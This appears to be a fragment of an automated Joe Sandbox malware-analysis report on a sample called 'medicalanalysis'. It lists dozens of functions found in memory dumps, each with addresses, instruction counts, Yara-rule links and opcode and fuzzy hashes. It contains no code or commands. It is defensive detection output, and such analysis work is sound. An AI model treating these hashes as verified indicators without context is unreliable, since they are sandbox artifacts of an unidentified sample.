                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48516C34B106099FCB04EF64E499AAEBBB6FFC8701F108119F5029B3A4DF749946DB91
                                                                                                                                                                                                                                                                                                              Function 057C78D8 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228715270.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_57c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 70fdd199d00d94172a00ba01e06d84fed48e3648c295ba5f534b6d8708efa862
                                                                                                                                                                                                                                                                                                              • Instruction ID: 4ae9b7394683089a8b05fb35e850278635b3c30e3bb3551d1689c211e0a718b6
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70fdd199d00d94172a00ba01e06d84fed48e3648c295ba5f534b6d8708efa862
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E451B574D05208DFDB18DFA9D984A9DBBB2FF89304F20806ED409AB360DB359946DF40
                                                                                                                                                                                                                                                                                                              Function 057C78C8 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228715270.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_57c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 54b1b99c46ff3ef899ec93e732982fba6c548bdb7465c2e3e2efec0b61d0a0d7
                                                                                                                                                                                                                                                                                                              • Instruction ID: 975767e4376e3f361adfaae457b90947c50a906e5434c43eee424e95e022219f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54b1b99c46ff3ef899ec93e732982fba6c548bdb7465c2e3e2efec0b61d0a0d7
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8741C270D05208DFDB18CFB9D49469DBBB2BF89304F24816ED809AB361DB309942DF41
                                                                                                                                                                                                                                                                                                              Function 021B192F Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2218058169.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_21b0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 0ab68db7265859cb2f9db372d6519da58e35b719a728b05d5d3c670971d20a12
                                                                                                                                                                                                                                                                                                              • Instruction ID: eabf5afeb695ffd1855d5bcbf4293805c135bee299d5a1df45f127569e52a680
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ab68db7265859cb2f9db372d6519da58e35b719a728b05d5d3c670971d20a12
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59417034A84108EFDB15DF28D0A8BE973F3BF89350F1684B5E00A8B2A4C774A980CB40
                                                                                                                                                                                                                                                                                                              Function 0579F0D0 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 1090d52b71d3bd30ec696cb7729d6601a8994a2e4ce57d06a4f55ae11a9e7f4c
                                                                                                                                                                                                                                                                                                              • Instruction ID: 48baf82663ecd4bd4e6fb8341a747022ec4ec6d4b67f43275690163763d17172
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1090d52b71d3bd30ec696cb7729d6601a8994a2e4ce57d06a4f55ae11a9e7f4c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE31E4366501049FCB09DF59E888EA9BBB2FF49320F1680A8E5099B372D731ED55DF90
                                                                                                                                                                                                                                                                                                              Function 0579A5F3 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 943e43fe4fbb15530b57264c35d16a4e1cebff39018baee7dd88ad561d7814de
                                                                                                                                                                                                                                                                                                              • Instruction ID: a1cb293529c6736857377f96421f6aeb3ea20f734f54c12e952c65c4c68ca366
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 943e43fe4fbb15530b57264c35d16a4e1cebff39018baee7dd88ad561d7814de
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A3192353056418FCB199F38E85896A7BA6FFC53203148579E55ACB361EF31DC02D7A1
                                                                                                                                                                                                                                                                                                              Function 05794198 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 863123df55f6ec824ea7957ff554ae0acc594d13993d8a227d55cee8ad517871
                                                                                                                                                                                                                                                                                                              • Instruction ID: aaea654ef5398f29784caa9c0d7fdfe5bc9e879233e88d0f693da1c124b11892
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 863123df55f6ec824ea7957ff554ae0acc594d13993d8a227d55cee8ad517871
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72418B71A002158FCF18DFA5E944ABEBBB6FF88310F01842AE516E7290D734D946DBA1
                                                                                                                                                                                                                                                                                                              Function 05793358 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 67431590fb878e28911ba9e6e4a98fdcad51c4e135034a16988e4d8d130c44b9
                                                                                                                                                                                                                                                                                                              • Instruction ID: d067c4ee09634b4b848328bff3ebd945a6d835f014037b5682ee69658a6c93cd
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67431590fb878e28911ba9e6e4a98fdcad51c4e135034a16988e4d8d130c44b9
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25314F75A01209AFCB18DFA9E484A9EBBF5EF49311F144569F405E7360DB709900DBA0
                                                                                                                                                                                                                                                                                                              Function 0579D298 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: da3a82d5a39213f9ddae7ff71c1c169e6aa5f76f22d716436d00dff0a1a9d338
                                                                                                                                                                                                                                                                                                              • Instruction ID: 343b02b0f661664b8ee8c3cc1a79f05921d5798083508ba85f84d1c4270e1bd3
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da3a82d5a39213f9ddae7ff71c1c169e6aa5f76f22d716436d00dff0a1a9d338
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC21F4313082008FCB399B69F88496AFBE9EFC1361B1981BAD11DCB255CB31EC42D760
                                                                                                                                                                                                                                                                                                              Function 057922E0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 0a7fa4562b9ee2268546b3085f2da066c5ae95b6220943975abc8804b1be8a5b
                                                                                                                                                                                                                                                                                                              • Instruction ID: b2b3e076aa0d2df236142595ab15ba4c7bbf20c88cb01d1de5ce258eed0b06c0
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a7fa4562b9ee2268546b3085f2da066c5ae95b6220943975abc8804b1be8a5b
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 173138706003029FCB18EB68D95ABEEBFF9EF89304F14853AE005C7257DE70990697A1
                                                                                                                                                                                                                                                                                                              Function 057967A9 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: d716326a5f0259db80759692515ec35bc0aa6400883d23db87b2a4e53be3ec87
                                                                                                                                                                                                                                                                                                              • Instruction ID: f2a8a001bdfe3075882a4a225d4fd42b9b3b67157dd8e59b1ae7deac24c31670
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d716326a5f0259db80759692515ec35bc0aa6400883d23db87b2a4e53be3ec87
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E315A347007018FCB29AF25D89896ABBB6FF85355710852DE9468B360DF31EC46DB51
                                                                                                                                                                                                                                                                                                              Function 057991D0 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 88fad1973feb4b66b523ae0cfddf8e73df33b89061d323f50c1de78403b0fbe3
                                                                                                                                                                                                                                                                                                              • Instruction ID: ada94db5b4eaa5f8a1dd8ad5cd7b6edffc3f24c3cf6370a132cb7984bf599f46
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88fad1973feb4b66b523ae0cfddf8e73df33b89061d323f50c1de78403b0fbe3
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21D672A042089FDB19DFA4D848C9EFFF9FF49300F05446AE545DB251DA30AD05DBA1
                                                                                                                                                                                                                                                                                                              Function 057914D1 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 6d60af0154d72fdf35256467cfe4aa5d59b8b4fe0a3ea065b61d1eb2ad76f82c
                                                                                                                                                                                                                                                                                                              • Instruction ID: aec703ba8f387d82e1b222e0d12e7dbf528e2b17c2b234d729e94b4e5d052abe
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d60af0154d72fdf35256467cfe4aa5d59b8b4fe0a3ea065b61d1eb2ad76f82c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 593191B0E0920ADFCF54DFA9E4406ACBBF5BB45300F50C1EAD41997395D7709A51EB60
                                                                                                                                                                                                                                                                                                              Function 05796620 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: e2e8e419582ab2bb9bb458743e4c3cb2581ee4f8545a21812fe7c103dac8ffae
                                                                                                                                                                                                                                                                                                              • Instruction ID: e6e5a5399f2546cb7edfb5f7478e8fa6447a2c379bd12e89318b1d8a5eae4a21
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2e8e419582ab2bb9bb458743e4c3cb2581ee4f8545a21812fe7c103dac8ffae
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD218C31E00259DFDF08DF74E904BAEBBF5AB04340F108166D519DB290E734DA11EBA1
                                                                                                                                                                                                                                                                                                              Function 0579ECDF Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 01ef1a98402227c8431622d97cc7e84152fb960c29925b2b02ba5c40c1a842eb
                                                                                                                                                                                                                                                                                                              • Instruction ID: 2f75c96a3d52405793787093574f2b3796c36c3350b6534e177a4c79bf1d0048
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01ef1a98402227c8431622d97cc7e84152fb960c29925b2b02ba5c40c1a842eb
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F217F3530C2615FDF59DF35EC58B6A3BADAF86611B084069F946CB3A2DA34C840EB60
                                                                                                                                                                                                                                                                                                              Function 0093D030 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2217832544.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_93d000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 2715316007ded678fb4f9f666ac5d30f783b0f34faf9e41eda4de9e48b3fc206
                                                                                                                                                                                                                                                                                                              • Instruction ID: 24a36ab25c3933cf4eba26e252875b2586caf733cba8b810d064d29d831f3b85
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2715316007ded678fb4f9f666ac5d30f783b0f34faf9e41eda4de9e48b3fc206
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55213771509200DFCB19DF14EAD4B27BFA5FB84714F20C569E8090B246C33AD816CFA2
                                                                                                                                                                                                                                                                                                              Function 0579F0C3 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: e28238c98241c74df1b21c4a54653a38b7d3e56b4a4396cacf9e9da5bdf05c0b
                                                                                                                                                                                                                                                                                                              • Instruction ID: 5d1de64850337129bd1a19f5fed530bdce27e4f38455df92f09e086ca2e5a053
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e28238c98241c74df1b21c4a54653a38b7d3e56b4a4396cacf9e9da5bdf05c0b
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4212C76A10104AFCB09CF99E988E99BBB6FF49310F1540A5E6099B372D731E811DB50
                                                                                                                                                                                                                                                                                                              Function 0093D006 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2217832544.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_93d000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: d96f71fba72c02a61cfcc4d788508629da1e93d39924c9a9a7a6a02239196a88
                                                                                                                                                                                                                                                                                                              • Instruction ID: 2858a92529f0a70d209116660f21be7913cf6aef12cf672e7279753bb233c1e2
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d96f71fba72c02a61cfcc4d788508629da1e93d39924c9a9a7a6a02239196a88
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB31517150E3C09FCB078F24D990716BF75EB46214F1981DBD8848F1A7C339981ACBA2
                                                                                                                                                                                                                                                                                                              Function 0579A738 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 7b4427b9fb7b08e73631db98814ababe61d81fbf749d11babc131e5490fc3fdf
                                                                                                                                                                                                                                                                                                              • Instruction ID: 9ef0cb8aafa1a3deddfb9ab078e0f0c039b683738cf0822d8ebf42cc1702ba02
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b4427b9fb7b08e73631db98814ababe61d81fbf749d11babc131e5490fc3fdf
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92211735A002198FDF08DF54D585AEDB7F2FF48311F2041A5E405AB3A1CB32AD45DBA0
                                                                                                                                                                                                                                                                                                              Function 0579A728 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: ce96c4b0e86fd12f28a7b0f52b61a78ead38a90f0e3838c23de963c3b12ec0af
                                                                                                                                                                                                                                                                                                              • Instruction ID: 17cd78da8b0054ff4cfd70dc9ee8296806cfe042228f797882caebdb9c84f993
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce96c4b0e86fd12f28a7b0f52b61a78ead38a90f0e3838c23de963c3b12ec0af
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A211575A002188FDF09DF64D585AEEB7F2FF49300F2145A5E405AB2A5CB32AD45EBA0
                                                                                                                                                                                                                                                                                                              Function 057C7FB8 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228715270.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_57c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 9894f975f6bc54fe18212a2563e9402566eff442303f8f04a1070ebbcd8d244a
                                                                                                                                                                                                                                                                                                              • Instruction ID: bd14f695f82cd50ccafd08e2ae46fcd93c7e2b03b89397dcb94499c8be452db3
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9894f975f6bc54fe18212a2563e9402566eff442303f8f04a1070ebbcd8d244a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5211BB0E0820ADFCB14DFA9D4846BEBBF6FB44300F1085AED805A7250D7359982DF91
                                                                                                                                                                                                                                                                                                              Function 0579CE31 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 8e16c1d8840150d84078ffd38790d3cfa89f8e97d42dd9a37e6740d0c5e230bf
                                                                                                                                                                                                                                                                                                              • Instruction ID: 77c61df79cb179d0f5c1f39448cf9add064508b3da6dea93c8a6553f8e94d3ed
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e16c1d8840150d84078ffd38790d3cfa89f8e97d42dd9a37e6740d0c5e230bf
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5711B2317542004FDF069A29F89896ABBABEBD6611718807FE502CB726CA349C01E760
                                                                                                                                                                                                                                                                                                              Function 05794A50 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 00f9970a863675d921a2c04aabbab1d222d1dd0483516fbae14af4b8eacc59c4
                                                                                                                                                                                                                                                                                                              • Instruction ID: 19b6808b8c8a2ffcc2ced47ff52523d771c780bf5fecdf051d065d1cabf9f211
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00f9970a863675d921a2c04aabbab1d222d1dd0483516fbae14af4b8eacc59c4
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC11E331B042499FCF09DBA8E8485EDBFF7FB85210F0480AAD009E7261EB305D86D796
